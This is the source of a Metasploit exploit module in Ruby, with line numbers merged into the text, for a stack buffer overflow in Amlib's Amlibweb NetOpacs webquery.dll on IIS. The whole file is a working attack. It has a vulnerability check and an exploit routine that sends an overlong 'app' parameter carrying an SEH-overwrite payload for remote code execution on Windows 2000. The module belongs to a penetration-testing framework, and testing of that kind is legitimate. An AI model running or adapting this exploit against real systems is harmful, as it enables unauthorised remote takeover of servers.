Path: blob/master/modules/exploits/windows/http/amlibweb_webquerydll_app.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Amlibweb NetOpacs webquery.dll Stack Buffer Overflow',16'Description' => %q{17This module exploits a stack buffer overflow in Amlib's Amlibweb18Library Management System (NetOpacs). The webquery.dll19API is available through IIS requests. By specifying20an overly long string to the 'app' parameter, SeH can be21reliably overwritten allowing for arbitrary remote code execution.22In addition, it is possible to overwrite EIP by specifying23an arbitrary parameter name with an '=' terminator.24},25'Author' => [ 'aushack' ],26'Arch' => [ ARCH_X86 ],27'License' => MSF_LICENSE,28'References' => [29[ 'OSVDB', '66814' ],30[ 'BID', '42293' ],31[ 'URL', 'http://www.aushack.com/advisories/' ],32],33'Privileged' => true,34'DefaultOptions' => {35'EXITFUNC' => 'thread',36'AllowWin32SEH' => true37},38'Payload' => {39# 'Space' => 600,40'BadChars' => "\x00\x0a\x0d\x20%=?\x2f\x5c\x3a\x3d\@;!$",41'EncoderType' => Msf::Encoder::Type::AlphanumMixed,42'DisableNops' => true,43'StackAdjustment' => -3500,44},45'Platform' => ['win'],46'Targets' => [47# aushack - Tested OK 20100803 w2k IIS548[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS549# [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.50],51'DisclosureDate' => '2010-08-03', # 0day52'DefaultTarget' => 0,53'Notes' => {54'Reliability' => UNKNOWN_RELIABILITY,55'Stability' => UNKNOWN_STABILITY,56'SideEffects' => UNKNOWN_SIDE_EFFECTS57}58)59)6061register_options(62[63Opt::RPORT(80),64]65)66end6768def check69connect7071rand = Rex::Text.rand_text_alpha(10)7273sock.put("GET /amlibweb/webquery.dll?#{rand}= HTTP/1.0\r\n\r\n")74res = sock.get_once75disconnect7677if (res.to_s =~ /<H1>BAD REQUEST<\/H1><P>Your client sent a request that this server didn't understand.<br>Request:\s(\w+)/)78if ($1 == rand)79return Exploit::CheckCode::Vulnerable80end81end82Exploit::CheckCode::Safe83end8485def exploit86connect87seh = generate_seh_payload(target.ret)8889buffer = Rex::Text.rand_text_alphanumeric(3028) + seh90sploit = "GET /amlibweb/webquery.dll?app=" + buffer + " HTTP/1.0\r\n"91sock.put(sploit + "\r\n\r\n")9293handler94disconnect95end96end979899